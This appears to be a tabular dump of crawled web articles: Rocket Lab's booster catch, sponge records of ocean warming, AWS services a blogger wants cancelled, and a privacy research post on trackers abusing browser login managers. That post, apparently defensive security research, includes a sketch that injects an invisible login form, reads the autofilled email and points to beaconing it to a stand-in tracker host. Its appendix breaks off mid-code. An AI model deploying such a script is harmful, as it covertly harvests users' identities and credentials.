id (int64, 3 to 41.8M) | url (string, 1 to 1.84k chars) | title (string, 1 to 9.99k chars, ⌀) | author (string, 1 to 10k chars, ⌀) | markdown (string, 1 to 4.36M chars, ⌀) | downloaded (bool, 2 classes) | meta_extracted (bool, 2 classes) | parsed (bool, 2 classes) | description (string, 1 to 10k chars, ⌀) | filedate (string, 2 classes) | date (string, 9 to 19 chars, ⌀) | image (string, 1 to 10k chars, ⌀) | pagetype (string, 365 classes) | hostname (string, 4 to 84 chars, ⌀) | sitename (string, 1 to 1.6k chars, ⌀) | tags (string, 0 classes) | categories (string, 0 classes)
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---
31,260,155 |
https://www.bbc.co.uk/news/science-environment-61307512
|
Rocket Lab: Helicopter catches returning booster over the Pacific
|
Jonathan Amos
|
# Rocket Lab: Helicopter catches returning booster over the Pacific
**The US-New Zealand Rocket Lab company has taken a big step forward in its quest to re-use its launch vehicles by catching one as it fell back to Earth.**
A helicopter grabbed the booster in mid-air as it parachuted back towards the Pacific Ocean after a mission to orbit 34 satellites.
The pilots weren't entirely happy with how the rocket stage felt slung beneath them and released it for a splashdown.
Nonetheless, company boss Peter Beck lauded his team's efforts.
"Bringing a rocket back from space and catching it with a helicopter is something of a supersonic ballet," the CEO said.
"A tremendous number of factors have to align and many systems have to work together flawlessly, so I am incredibly proud of the stellar efforts of our recovery team and all of our engineers who made this mission and our first catch a success."
Mr Beck said the hard parts of rocket recovery had now been proven and he looked forward to his staff perfecting their mid-air technique.
The entrepreneur later published a picture of the rocket stage after it had been picked up by a ship. It was intact and appeared to have coped extremely well with the heat that would have been generated on the descent through the atmosphere.
Today, only one company routinely recovers orbital rocket boosters and reflies them. That's California's SpaceX firm, which propulsively lands its stages back near the launch pad or on a barge out at sea.
Re-using flight-proven boosters should reduce the cost of rocket missions, provided maintenance can be kept to a minimum. SpaceX says very little refurbishment work is required between flights of its Falcon vehicles.
Rocket Lab, external will have to demonstrate similar gains to make the practice worthwhile.
Rocket Lab launches its two-stage Electron vehicles from New Zealand's Mahia Peninsula.
The first stage does the initial work of getting a mission off Earth, and once its propellants are expended falls back towards the planet.
The second, or upper, stage, completes the task of placing the satellite passengers in orbit with the help of a small kick-stage called Curie. Both the second stage and this Curie kick-stage eventually fall back into the atmosphere and burn up.
The first stage is given thermal protection as it plunges to Earth at speeds of almost 8,300km/h (5,150mph). Drag will take out much of this energy, before parachutes reduce the velocity to a mere 10m/s (22mph) to allow a Sikorsky S-92 to move in for capture.
Ordinarily, the helicopter would transfer the captured stage to land, but in this instance the pilots thought the load characteristics of the stage were sufficiently different from those in test flights that safety demanded they release the booster and let it go into the water.
"I would say 99% of everything we needed to achieve today, we achieved; the 1% was the pilots didn't like the feel of it. So they jettisoned (the stage)," Mr Beck told reporters.
"And really, that kind of accounts for the amount of work we've got to do as well. Ninety-nine percent of the work is done, we'll figure out why the pilots didn't like it and go fix that."
Tuesday's mission, dubbed "There And Back Again", left the ground at 10:49 NZST (22:49 GMT, Monday).
Its primary objective was to take a diverse group of 34 spacecraft to orbit, more than 500km (310 miles) above the Earth. These payloads included four mini-satellites for Scottish manufacturer Alba Orbital, and three for E-Space, a new company started by serial space entrepreneur Greg Wyler.
Mr Wyler is well known in the space business and has been described as the "godfather of mega-constellations", the giant telecommunications networks now being developed by the likes of SpaceX, OneWeb and Amazon.
Mr Wyler founded OneWeb and before that, O3b, which sought to connect the unconnected (O3b stood for "other three billion", the number of people without an internet connection).
His new venture, E-Space, proposes to loft tens of thousands of satellites. But mindful of the congestion in orbit and the risk of collisions this might cause, the businessman claims his forthcoming constellation would also catch space debris and bring it out of the sky, leading to a net-positive impact on the space environment.
| true | true | true |
The US-New Zealand Rocket Lab firm takes a big step forward in its quest to re-use launch vehicles.
|
2024-10-12 00:00:00
|
2022-05-03 00:00:00
|
article
|
bbc.com
|
BBC News
| null | null |
|
4,914,955 |
http://codinginmysleep.com/trend-micro-misses-point-on-bitcoin-mining-malware/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
39,275,272 |
https://eos.org/articles/oceans-may-have-already-seen-1-7c-of-warming
|
Oceans May Have Already Seen 1.7°C of Warming - Eos
|
Kimberly M S Cartier
|
Sponges from the Caribbean retain a record of ocean temperatures stretching back hundreds of years. These newly revealed paleoclimate records suggest that sea surface temperatures (SSTs) began rising in response to industrial era fossil fuel burning around 1860.
That’s 80 years earlier than SST measurements became common and predates the global warming start date used by the Intergovernmental Panel on Climate Change (IPCC). On the basis of these new sponge records, scientists think that temperatures are currently 1.7°C warmer than preindustrial levels.
The study’s researchers argue that the world has already surpassed the goal of the 2015 Paris Agreement to limit atmospheric warming to less than 1.5°C above preindustrial temperatures and that we could reach 2°C of warming before 2030.
“We’re further advanced in the global warming scenario, and the amount of time we have to take action to prevent it is seriously diminished,” said Malcolm McCulloch, a marine and coral geochemist at the University of Western Australia in Crawley and lead author on the new study. “We’ve got to start doing serious mitigation and serious reductions in emissions.”
These results were published in *Nature Climate Change*.
**Old Sponges Fill Gaps**
The sclerosponges studied (*Ceratoporella nicholsoni*) are a group of long-lived sponges that live exclusively in the Caribbean at depths with little variation in light or temperature. Like tree rings, a sponge’s skeleton retains a record of its environmental conditions throughout its lifetime.
“These sponges are extremely slow growing,” explained Amos Winter, a study coauthor and paleoceanographer at Indiana State University in Terre Haute. “A 10-centimeter sponge, which isn’t very large, can go back 400 years.”
That longevity is key to the new study’s analysis of modern-day global warming.
The IPCC compares modern temperatures with the average temperature between 1850 and 1900 to define today’s warming relative to a preindustrial world.
However, “it’s well recognized that human emissions began increasing significantly in the 1750s,” said Duo Chan, a climate scientist at the University of Southampton in the United Kingdom who was not involved with the new study.
Ship-based measurements of SST go back only to around 1850. The records contain many inconsistencies and remain sparse until the mid-1900s, when modern instrumentation took over. Even then, there are notable data gaps during such events as World War II. Paleoclimate proxies such as those stored in sclerosponges can extend the record of SSTs back to truly preindustrial times and help fill gaps in shipboard measurements.
“The IPCC’s adoption of a later preindustrial reference period was a compromise, largely due to the lack of sufficient instrumental data for quantifying global temperatures before the 1850s,” Chan said.
These sclerosponge records can unravel the history of past sea surface temperatures, said Kaustubh Thirumalai, a paleoceanographer at the University of Arizona in Tucson who was not involved with this study. (Thirumalai is a science advisor for *Eos*.)
**An 80-Year Head Start**
With the help of local divers, the researchers collected six sclerosponges from 2007 to 2012 near Puerto Rico and St. Croix in the U.S. Virgin Islands. They used uranium-thorium radioisotope dating to construct a growth timeline for each sponge that goes back about 300 years.
Within each 2-year growth interval, they measured the ratio of strontium to calcium. Calcifying coral skeletons preferentially take in calcium over strontium as temperatures increase, so the ratio is a proxy for seawater temperature. They calibrated their sclerosponge temperature timeline against recent (1964–2012) instrumental measurements.
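The general shape of such a calibration can be sketched as follows (TypeScript, with invented numbers; the study's actual calibration against the 1964–2012 instrumental record and its uncertainty treatment are more involved): fit a linear Sr/Ca-to-temperature relationship over the instrumental interval, then apply it to older skeletal intervals.

```typescript
// Hypothetical illustration only: calibrate a Sr/Ca paleothermometer by
// ordinary least squares against an instrumental record, then apply it to
// pre-instrumental skeletal intervals. All numbers are invented.

interface CalibrationPoint { srCa: number; tempC: number; }

function fitLinear(points: CalibrationPoint[]): { slope: number; intercept: number } {
  const n = points.length;
  const meanX = points.reduce((s, p) => s + p.srCa, 0) / n;
  const meanY = points.reduce((s, p) => s + p.tempC, 0) / n;
  let sxy = 0;
  let sxx = 0;
  for (const p of points) {
    sxy += (p.srCa - meanX) * (p.tempC - meanY);
    sxx += (p.srCa - meanX) ** 2;
  }
  const slope = sxy / sxx;
  return { slope, intercept: meanY - slope * meanX };
}

// Calibration interval (cf. 1964-2012): measured Sr/Ca vs. instrumental SST.
const calibration: CalibrationPoint[] = [
  { srCa: 9.10, tempC: 27.8 },
  { srCa: 9.05, tempC: 28.1 },
  { srCa: 9.00, tempC: 28.4 },
  { srCa: 8.95, tempC: 28.7 },
];

const { slope, intercept } = fitLinear(calibration);

// Reconstruct temperatures for older, pre-instrumental growth intervals.
const preindustrialSrCa = [9.22, 9.20, 9.21];
console.log(preindustrialSrCa.map(r => (slope * r + intercept).toFixed(2)));
// [ '27.08', '27.20', '27.14' ]
```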
*Ceratoporella nicholsoni* may be endemic to the Caribbean, but these sponges can still be used to understand globally averaged trends.
Scientists have found that temperature trends in Caribbean waters closely follow global mean SST trends. Sclerosponges live at depths within the ocean mixed layer, where temperatures are mostly the same from the surface to about 100 meters down. So the ambient seawater temperatures recorded by sclerosponges can be used to understand sea surface temperatures too.
The sclerosponges recorded some well-known global temperature anomalies, such as the cooling period after the Tambora eruption in 1815. Ocean temperatures were relatively steady from 1700 to 1790, followed by an era of volcanic cooling from 1790 to 1840 and then another steady but slightly warmer period from 1840 to the early 1860s. Researchers trace anthropogenic climate change to that period—about 80 years earlier than instrumental SST records show.
The sponges’ industrial starting line of the early 1860s implies that Earth warmed by 1.7°C between then and about 2020, assuming that the land and ocean have warmed by the same amount. That’s about 0.5°C higher than IPCC estimates and suggests that the planet is on track to surpass 2°C of warming before 2030.
Thirumalai found the research to be “innovative and clever,” although he said the sclerosponge records might have too much uncertainty to sufficiently pinpoint events such as the 19th century volcanic cooling. Too, he wanted the researchers to have shown in more detail how temperature trends in the Caribbean were representative of global SST anomalies.
Nevertheless, he said, “it is always useful to generate new and independent paleotemperature records to help minimize uncertainties in our understanding of anthropogenic warming and the baseline of preindustrial conditions.”
**Untangling the Cause of Warming**
“Integrating these sclerosponge findings with corrected instrumental data could offer a more comprehensive view of historical SST evolution,” Chan said. However, he cautioned against immediately adopting the updated warming values.
The sclerosponge warming rates almost mirror modern instrumental records in a broad sense, but there are some differences, even when accounting for different starting lines, Chan said. Research is ongoing to correct some biases and errors in historic instrumental records, which might reconcile some of these differences.
Too, when looking as far back as 1700, Earth’s climate might still have been rebounding from the Little Ice Age (roughly 1300–1850). That might account for some of the warming during the early 19th century, Chan said, but definitely not all.
“It is essential to more accurately distinguish the anthropogenic component from other factors, particularly during the early industrial period,” Chan said. “This distinction not only enhances our understanding of climate change but also has significant political implications, informing policy and target setting in the context of global warming.”
McCulloch, Winter, and their colleagues urged IPCC scientists and climate modelers to consider this new preindustrial starting line. Whether it will be adopted is uncertain, but if the world has already surpassed 1.5°C of warming, the researchers argue that continued climate action is more important than ever.
—Kimberly M. S. Cartier (@AstroKimCartier), Staff Writer
*Correction 12 February 2024: The date of the sclerosponges’ industrial starting line has been updated.*
| true | true | true |
The global warming clock started ticking decades earlier than current estimates assume, according to Caribbean sponges.
|
2024-10-12 00:00:00
|
2024-02-05 00:00:00
|
article
|
eos.org
|
Eos
| null | null |
|
36,579,995 |
https://www.youtube.com/watch?v=KDRnEm-B3AI
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
41,163,398 |
https://justingarrison.com/blog/2024-08-05-more-aws-services-they-should-cancel/
|
21 More AWS Services They Should Cancel
| null |
# 21 More AWS Services They Should Cancel
##### Posted on August 5, 2024 • 7 minutes • 1416 words
AWS has recently been silently removing services for new users. They claim existing customers will not be affected for many of the services, but it is clear that the company is trying to reduce their overhead and trim some fat.
Since December 2023 they have deprecated 14 services, features, or versions of services. Of course Amazon doesn’t keep track of these changes, and until someone makes a killedbygoogle for AWS we’ll have to hear about it from other customers. Services include Honeycode, Cloud9, CodeCommit, and a bunch of others you’ve never heard of.
So here are the services I think AWS should cancel. I’ll start with the obvious ones and get bolder down the list. More cuts are coming. Be prepared for how you’ll migrate.
What would you kill? Let me know on Bluesky. Services crossed out on this list were announced as deprecated after this post was written.
- Amazon Managed Blockchain
- Amazon Workmail
- ~~AWS App Mesh~~
- AWS Proton
- AWS Elastic Beanstalk
- Amazon Lightsail
- Amazon GameLift
- Amazon Braket
- Amazon CodeGuru
- ~~AWS DeepRacer~~
- Amazon Personalize
- Amazon Kendra
- AWS App2Container
- Amazon TimeStream
- ~~Amazon RDS on VMware~~
- Bottlerocket
- AWS Cloud Control API
- NAT Gateway
- Amazon ACK
- AWS CloudFormation
- AWS CDK
## Blockchain
I have no idea how this 6 pager was created and passed through the rigorous OP1 process. Some PM pulled together a bunch of data and lied about it to leadership and they fell for it.
This is the exact thing I was referring to when I wrote about How to Lie with Data . It’s a problem at any “data driven company” and when one group of people have all the power it’ll happen.
## WorkMail
Even Amazon doesn’t use WorkMail. Why is this being inflicted on customers?
## AppMesh
This is an obvious service that got very little adoption and is already being replaced with VPC Lattice. It’s no surprise that App Mesh should be retired and probably should have been a long time ago.
## Proton
I worked at Amazon when Proton was being developed and all of the OP1 docs and 6 pagers didn’t make sense to me. There was a lot of data arguing for a platform engineering type team that would use it to build abstractions for the rest of the company.
The workflows and use cases were completely contrived and it was a new interface for CloudFormation. Can we please stop pretending a new interface on top of a terrible service is going to work?
## Beanstalk
Beanstalk was great when it was created, back when people didn’t know how to set up CI/CD and there wasn’t a proliferation of automated build tools. In 2024 it hasn’t kept up with best practices, and people looking for something simple and automatic should look elsewhere.
It was partially replaced with App Runner and if Beanstalk wasn’t so successful, and App Runner so unsuccessful, I’m assuming they would have already killed it.
## Lightsail
I actually really like Lightsail. It’s the simplified version of AWS with simpler pricing and keeps people using fundamentals. But it’ll never succeed at AWS. There’s not enough money or investment in it and it should be retired so someone else can build something better. This is the only service I want AWS to cancel so it can get better.
## GameLift
The gaming industry has been reducing costs in many different ways, and a proprietary game server service is not what they’re going to use going forward. There are much better open source options, and no one should tie their game’s success to a single vendor.
## Braket
QLDB is shut down and Braket isn’t helping anyone learn quantum computing. This is an obvious cut for a service no one is asking for.
## CodeGuru
I thought this was already being retired. Why is this still around? This is obviously going to be replaced with Amazon Q and the longer they keep CodeGuru around the more trust they lose with customers.
## DeepRacer
This was a cool tech demo. Not a product.
In the beginning this was a halo product, like Lambda, but now it’s kinda embarrassing how little the tools have improved.
## Personalize
If I buy a toaster Amazon’s recommendation engine will recommend more toasters.
Anyone that would use a personalization service based on Amazon’s recommendation engine hasn’t looked at any other options.
It’s only a matter of time until this is rebranded under the Q umbrella (`sed 's/ML/AI/g'`) or shut down.
## Kendra
Kendra is already jumping on the LLM train and I know how painful “Enterprise search” can be. But all of the examples I’ve seen look like they could use any number of other services or tools.
## App2Container
You created an app and want to run it in containers, but you refuse to learn how to package it. This isn’t going to work out well for you.
I understand enterprise applications are extremely complex, and I also think if you’re not going to take the time to understand the platform where it runs you shouldn’t be automating the migration. This is another neat tech demo that somehow wrote enough documents to turn into a product and it should go away.
## Timestream
Timestream was announced and 2 years later came out. It’s a hosted version of InfluxDB.
I don’t know if the delay was legal issues or lack of HA options for Influx, but anyone that waited around to realize it’s just InfluxDB under the hood–which I think is a good time series database–must have been disappointed. Influx is one of the easiest databases I’ve ever run and you don’t need to pay Amazon premiums to use it.
## RDS on VMware
Anyone using VMware on AWS deserves to pay through the nose for licensing. The same goes for using AWS on VMware.
I have no idea how widely this service is adopted, but I have a feeling more than one DBA team was let go so companies could afford it.
## Bottlerocket
Amazon isn’t good at Linux Distros. If Amazon Linux wasn’t the default supported option I doubt it would have ever been used. A Linux distro that can only be used in one environment, AWS, with less frequent updates and more convoluted packaging options is a bad technology choice.
Bottlerocket takes it one step further by limiting where you can use the OS in AWS. I am all for API driven Linux–I work at Sidero Labs after all–but this is poorly designed and not well maintained. It’ll also probably get huge adoption once it becomes the default for EKS and Karpenter.
It should be shut down before it causes a lot of pain for customers, or it should be completely re-written to follow an open API spec.
## Cloud Control API
A single, consistent API for all of AWS sounds like a good thing. Until you realize that API is just a different interface for CloudFormation and is stateful.
I know some tools started adopting this API, but I have no idea where their migration stands and how it’s working out for them.
## NAT Gateway
This is possibly the most customer-hostile service AWS runs. It’s required for basic functionality and has predatory pricing. Please, please, please get rid of this service and make it a built-in VPC option without the price gouging.
## ACK
“Everything should be a Kubernetes CRD” has been an idea floating around for a while. ACK was an attempt to autogenerate Kubernetes controllers from the service SDKs and make the service teams own them. They didn’t want to own them, and the API discrepancies between services created a lot of edge cases in the generated code and made it hard to onboard new services.
If you want this, use Crossplane instead. It has broader support for infrastructure providers (not just AWS) and has a more flexible way to build “packages” to group infrastructure resources together. At least Crossplane doesn’t use CloudFormation.
## CloudFormation
There are very few people and companies that I know like CloudFormation. None more than Amazon.
I think an infrastructure as code service is a good idea, but I think CloudFormation is a terrible interface and should be completely replaced.
## CDK
I know there are some very passionate CDK users, but it’s yet another wrapper on top of CloudFormation and if CloudFormation needs to be deprecated then CDK needs to too. There are plenty of other people who are getting disenchanted with it and I think there are other better options that exist. Maybe the CDK can stay in some form on top of whatever replaces CloudFormation.
| true | true | true |
Please Amazon 🙏 kill these services too.
|
2024-10-12 00:00:00
|
2024-08-05 00:00:00
|
article
|
justingarrison.com
|
Justin Garrison
| null | null |
|
4,351,167 |
http://www.raywenderlich.com/19781/electronics-for-iphone-developers-tutorial-create-an-arduino-traffic-light
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
130,608 |
http://hcsoftware.sourceforge.net/gravitation/
| null | null | null | true | false | false | null | null | null | null | null | null | null | null | null |
3,088,342 |
http://www.bgr.com/2011/10/08/pre-sales-of-disappointing-iphone-4s-fail-to-disappoint/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
16,021,852 |
https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
|
No boundaries for user identities: Web trackers exploit browser login managers
|
Gunes Acar
|
*In this second installment of the **“No Boundaries” series**, we show how a long-known vulnerability in browsers’ built-in password managers is abused by third-party scripts for tracking on more than a thousand sites.*
by Gunes Acar, Steven Englehardt, and Arvind Narayanan
We show how third-party scripts exploit browsers’ built-in login managers (also called password managers) to retrieve and exfiltrate user identifiers without user awareness. To the best of our knowledge, our research is the first to show that login managers are being abused by third-party scripts for the purposes of web tracking.
The underlying vulnerability of login managers to credential theft has been known for years. Much of the past discussion has focused on password exfiltration by malicious scripts through cross-site scripting (XSS) attacks. Fortunately, we haven’t found password theft on the 50,000 sites that we analyzed. Instead, we found tracking scripts embedded by the first party abusing the same technique to extract email addresses for building tracking identifiers.
The image above shows the process. First, a user fills out a login form on the page and asks the browser to save the login. The tracking script is not present on the login page [1]. Then, the user visits another page on the same website which includes the third-party tracking script. The tracking script inserts an invisible login form, which is automatically filled in by the browser’s login manager. The third-party script retrieves the user’s email address by reading the populated form and sends the email hashes to third-party servers.
You can test the attack yourself on our live **demo page**.
We found two scripts using this technique to extract email addresses from login managers on the websites which embed them. These addresses are then hashed and sent to one or more third-party servers. These scripts were present on 1110 of the Alexa top 1 million sites. The process of detecting these scripts is described in our measurement methodology in the Appendix 1. We provide a brief analysis of each script in the sections below.
**Why does the attack work?** All major browsers have built-in login managers that save and automatically fill in username and password data to make the login experience more seamless. The set of heuristics used to determine which login forms will be autofilled varies by browser, but the basic requirement is that a username and password field be available.
Login form autofilling in general doesn’t require user interaction; all of the major browsers will autofill the username (often an email address) immediately, regardless of the visibility of the form. Chrome doesn’t autofill the password field until the user clicks or touches anywhere on the page. Other browsers we tested [2] don’t require user interaction to autofill password fields.
Thus, third-party javascript can retrieve the saved credentials by creating a form with the username and password fields, which will then be autofilled by the login manager.
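As a rough illustration of the mechanics just described (this is not the Adthink or OnAudience code, whose snippets appear in Appendix 2; the field names and the commented-out reporting endpoint are invented), a script of this kind could look something like the following DOM sketch:

```typescript
// Illustrative sketch only: the kind of third-party code the attack relies on.
// Field names and the reporting endpoint are invented; no hashing is shown.

function injectHiddenLoginForm(): HTMLInputElement {
  const form = document.createElement("form");
  form.style.display = "none";      // invisible to the user

  const user = document.createElement("input");
  user.type = "email";
  user.name = "username";

  const pass = document.createElement("input");
  pass.type = "password";           // a password field is required for the
  pass.name = "password";           // built-in login manager to kick in

  form.append(user, pass);
  document.body.appendChild(form);
  return user;
}

const userField = injectHiddenLoginForm();

// Poll until the login manager has autofilled the username field, then report
// it (in the real scripts, a hash of it) to a third-party server.
const timer = setInterval(() => {
  if (userField.value !== "") {
    clearInterval(timer);
    // navigator.sendBeacon("https://tracker.example/collect", userField.value);
  }
}, 500);
```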
**Why collect hashes of email addresses?** Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier. A user’s email address will almost never change — clearing cookies, using private browsing mode, or switching devices won’t prevent tracking. The hash of an email address can be used to connect the pieces of an online profile scattered across different browsers, devices, and mobile apps. It can also serve as a link between browsing history profiles before and after cookie clears. In a previous blog post on email tracking, we described in detail why a hashed email address is not an anonymous identifier.
**Scripts exploiting browser login managers**

*List of sites embedding scripts that abuse login managers for tracking*

“*Smart Advertising Performance*” and “*Big Data Marketing*” are the taglines used by the two companies who own the scripts that abuse login managers to extract email addresses. We have manually analyzed the scripts that contained the attack code and verified the attack steps described above. The snippets from the two scripts are given in Appendix 2.
**Adthink (audienceinsights.net):** After injecting an invisible form and reading the email address, the Adthink script sends MD5, SHA1 and SHA256 hashes of the email address to its server (secure.audienceinsights.net). Adthink then triggers another request containing the MD5 hash of the email to the data broker Acxiom (p-eu.acxiom-online.com).
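For context, deriving those three digests from an address is a one-liner per algorithm. The sketch below (Node-style TypeScript, not the tracker's code, and the trim/lowercase normalization is an assumption) shows why the same address always maps to the same identifiers, which is exactly what makes a hashed email non-anonymous:

```typescript
// Sketch only (not the tracker's code): deriving stable identifiers from an
// email address. The trim/lowercase normalization is an assumption.
import { createHash } from "node:crypto";

function emailDigests(email: string) {
  const normalized = email.trim().toLowerCase();
  return {
    md5: createHash("md5").update(normalized).digest("hex"),
    sha1: createHash("sha1").update(normalized).digest("hex"),
    sha256: createHash("sha256").update(normalized).digest("hex"),
  };
}

// The same address yields the same digests across browsers, devices, and
// cookie clears, which is what makes the hash a persistent tracking identifier.
console.log(emailDigests("Alice@example.com"));
```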
The Adthink script contains very detailed categories for personal, financial, and physical traits, as well as intents, interests and demographics. It is hard to comment on the exact use of these categories, but it gives a glimpse of what our online profiles are made up of.
**OnAudience (behavioralengine.com):** The OnAudience script is most commonly present on Polish websites, including newspapers, ISPs and online retailers. 45 of the 63 sites that contain the OnAudience script have the “.pl” country code top-level domain.
The script sends the MD5 hash of the email back to its server after reading it through the login manager. OnAudience script also collects browser features including plugins, MIME types, screen dimensions, language, timezone information, user agent string, OS and CPU information. The script then generates a hash based on this browser fingerprint. OnAudience claims to use anonymous data only, but hashed email addresses are not anonymous. If an attacker wants to determine whether a user is in the dataset, they can simply hash the user’s email address and search for records associated with that hash. For a more detailed discussion, see our previous blog post.
**Is this attack new?** This and similar attacks have been discussed in a number of browser bug reports and academic papers for at least 11 years. Much of the previous discussion focuses on the security implications of the current functionality, and on the security-usability tradeoff of the autofill functionality.
Several researchers showed that it is possible to steal passwords from login managers through cross-site scripting (XSS) attacks [3,4,5,6,7]. Login managers and XSS is a dangerous mixture for two reasons: 1) passwords retrieved by XSS can have more devastating effects compared to cookie theft, as users commonly reuse passwords across different sites; 2) login managers extend the attack surface for the password theft, as an XSS attack can steal passwords on any page within a site, even those which don’t contain a login form.
**How did we get here?** You may wonder how a security vulnerability persisted for 11 years. That’s because from a narrow browser security perspective, there is no vulnerability, and everything is working as intended. Let us explain.
The web’s security rests on the Same Origin Policy. In this model, scripts and content from different origins (roughly, domains or websites) are treated as mutually untrusting, and the browser protects them from interfering with each other. However, if a publisher directly embeds a third-party script, rather than isolating it in an iframe, the script is treated as coming from the publisher’s origin. Thus, the publisher (and its users) entirely lose the protections of the same origin policy, and there is nothing preventing the script from exfiltrating sensitive information. Sadly, direct embedding is common — and, in fact, the default — which also explains why the vulnerabilities we exposed in our previous post were possible.
This model is a poor fit for reality. Publishers neither completely trust nor completely mistrust third parties, and thus neither of the two options (iframe sandboxing and direct embedding) is a good fit: one limits functionality and the other is a privacy nightmare. We’ve found repeatedly through our research that third parties are quite opaque about the behavior of their scripts, and at any rate, most publishers don’t have the time or technical knowhow to evaluate them. Thus, we’re stuck with this uneasy relationship between publishers and third parties for the foreseeable future.
**The browser vendor’s dilemma.** It is clear that the Same-Origin Policy is a poor fit for trust relationships on the web today, and that other security defenses would help. But there is another dilemma for browser vendors: should they defend against this and other similar vulnerabilities, or view it as the publisher’s fault for embedding the third party at all?
There are good arguments for both views. Currently browser vendors seem to adopt the latter for the login manager issue, viewing it as the publisher’s burden. In general, there is no principled way to defend against third parties that are present on some pages on a site from accessing sensitive data on other pages of the same site. For example, if a user simultaneously has two tabs from the same site open — one containing a login form but no third party, and vice versa — then the third-party script can “reach across” browser tabs and exfiltrate the login information under certain circumstances. By embedding a third party *anywhere* on its site, the publisher signals that it completely trusts the third party.
Yet, in other cases, browser vendors have chosen to adopt defenses even if necessarily imperfect. For example, the HTTPOnly cookie attribute was introduced to limit the impact of XSS attacks by blocking the script access to security critical cookies.
There is another relevant factor: our discovery means that autofill is not just a security vulnerability but also a privacy threat. While the security community strongly prefers principled solutions whenever possible, when it comes to web tracking, we have generally been willing to embrace more heuristic defenses such as blocklists.
**Countermeasures.** Publishers, users, and browser vendors can all take steps to prevent autofill data exfiltration. We discuss each in turn.
Publishers can isolate login forms by putting them on a separate subdomain, which prevents autofill from working on non-login pages. This does have drawbacks including an increase in engineering complexity. Alternately they could isolate third parties using frameworks like Safeframe. Safeframe makes it easier for the publisher scripts and iframed scripts to communicate, thus blunting the effect of sandboxing. Any such technique requires additional engineering by the publisher compared to simply dropping a third-party script into the web page.
Users can install ad blockers or tracking protection extensions to prevent tracking by invasive third-party scripts. The domains used to serve the two scripts (behavioralengine.com and audienceinsights.net) are blocked by the EasyPrivacy blocklist.
Now we turn to browsers. The simplest defense is to allow users to disable login autofill. For instance, the Firefox preference `signon.autofillForms` can be set to false to disable autofilling of credentials.
A less crude defense is to require user interaction before autofilling login forms. Browser vendors have been reluctant to do this because of the usability overhead, but given the evidence of autofill abuse in the wild, this overhead might be justifiable.
The upcoming W3C Credential Management API requires browsers to display a notification when user credentials are provided to a page [8]. Browsers may display the same notification when login information is autofilled by the built-in login managers. Displays of this type won’t directly prevent abuse, but they make attacks more visible to publishers and privacy-conscious users.
Finally, the “writeonly form fields” idea can be a promising direction to secure login forms in general. The briefly discussed proposal defines ways to deny read access to form elements and suggests the use of placeholder nonces to protect autofilled credentials [9].
**Conclusion**
Built-in login managers have a positive effect on web security: they curtail password reuse by making it easy to use complex passwords, and they make phishing attacks harder to mount. Yet, browser vendors should reconsider allowing stealthy access to autofilled login forms in the light of our findings. More generally, for every browser feature, browser developers and standards bodies should consider how it might be abused by untrustworthy third-party scripts.
**End notes:**
[1] We found that login pages contain 25% fewer third-parties compared to pages without login forms. The analysis was based on our crawl of 300,000 pages from 50,000 sites.
[2] We tested the following browsers: Firefox, Chrome, Internet Explorer, Edge, Safari.
[3] https://labs.neohapsis.com/2012/04/25/abusing-password-managers-with-xss/
[4] https://www.honoki.net/2014/05/grab-password-with-xss/
[5] https://web.archive.org/web/20150131032001/http://ha.ckers.org:80/blog/20060821/stealing-user-information-via-automatic-form-filling/
[6] http://www.martani.net/2009/08/xss-steal-passwords-using-javascript.html
[7] https://ancat.github.io/xss/2017/01/08/stealing-plaintext-passwords.html
[8] “User agents MUST notify users when credentials are provided to an origin. This could take the form of an icon in the address bar, or some similar location.” https://w3c.github.io/webappsec-credential-management/#user-mediation-requirement
[9] Originally proposed in https://www.ben-stock.de/wp-content/uploads/asiacss2014.pdf
[10] https://jacob.hoffman-andrews.com/README/2017/01/15/how-not-to-get-phished.html
**APPENDICES**
**Appendix 1 – Methodology**
To study password manager abuse, we extended OpenWPM to simulate a user with saved login credentials and added instrumentation to monitor form access. We used Firefox’s nsILoginManager interface to add login credentials as if they were previously stored by the user. We did not otherwise alter the functionality of the password manager or attempt to manually fill login forms. This allowed us to capture actual abuses of the browser login manager, as any exfiltrated data must have originated from the login manager.
We crawled 50,000 sites from the Alexa top 1 million. We used the following sampling strategy: visit all of the top 15,000 sites, randomly sample 15,000 sites from the Alexa rank range [15,000, 100,000), and randomly sample 20,000 sites from the range [100,000, 1,000,000). This combination allowed us to observe the attacks on both high and low traffic sites. On each of these 50,000 sites we visited 6 pages: the front page and a set of 5 other pages randomly sampled from the internal links on the front page.
The fake login credentials acted as bait, allowing us to introduce an email and password to the page that could be collected by third parties without any additional interaction. Detection of email address collection was done by inspecting JavaScript calls related to form creation and access, and by the analysis of the HTTP traffic. Specifically, we used the following instrumentation:
- Mutation events to monitor elements inserted to the page DOM. This allowed us to detect the injection of fake login forms. When a mutation event fires, we record the current call stack and serialize the inserted HTML elements.
- Instrument HTMLInputElement to intercept access to form input fields. We log the input field value that is being read to detect when the bait email (autofilled by the built-in password manager) was sniffed.
- Store HTTP request and response data, including POST payloads to detect the exfiltration of the email address or password.
For both JavaScript (1, 2) and HTTP instrumentation (3) we store JavaScript stack traces at the time of the function call or the HTTP request. We then parse the stack trace to pin down the initiators of an HTTP request or the parties responsible for inserting or accessing a form.
We then combine the instrumentation data to select scripts that:
- inject an HTML element containing a password field (recall that the password field is necessary for the built-in password manager to kick in)
- read the email address from the input field automatically filled by the browser’s login manager
- send the email address, or a hash of it, over HTTP
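A hedged sketch of what the first of these checks can look like in page context (this is our own illustration, not OpenWPM's instrumentation; it uses the modern MutationObserver API rather than the mutation events mentioned above, and the invisibility check via `display: none` is a simplification):

```typescript
// Hedged sketch (not OpenWPM's actual instrumentation): flag dynamically
// injected, invisible forms that contain a password field, i.e. the first of
// the selection criteria above. Invisibility is simplified to display: none.

function containsHiddenPasswordForm(node: Node): boolean {
  if (!(node instanceof HTMLElement)) return false;
  const forms: Element[] = node.matches("form")
    ? [node]
    : Array.from(node.querySelectorAll("form"));
  return forms.some(
    form =>
      form.querySelector('input[type="password"]') !== null &&
      getComputedStyle(form).display === "none"
  );
}

const observer = new MutationObserver(mutations => {
  for (const m of mutations) {
    for (const added of Array.from(m.addedNodes)) {
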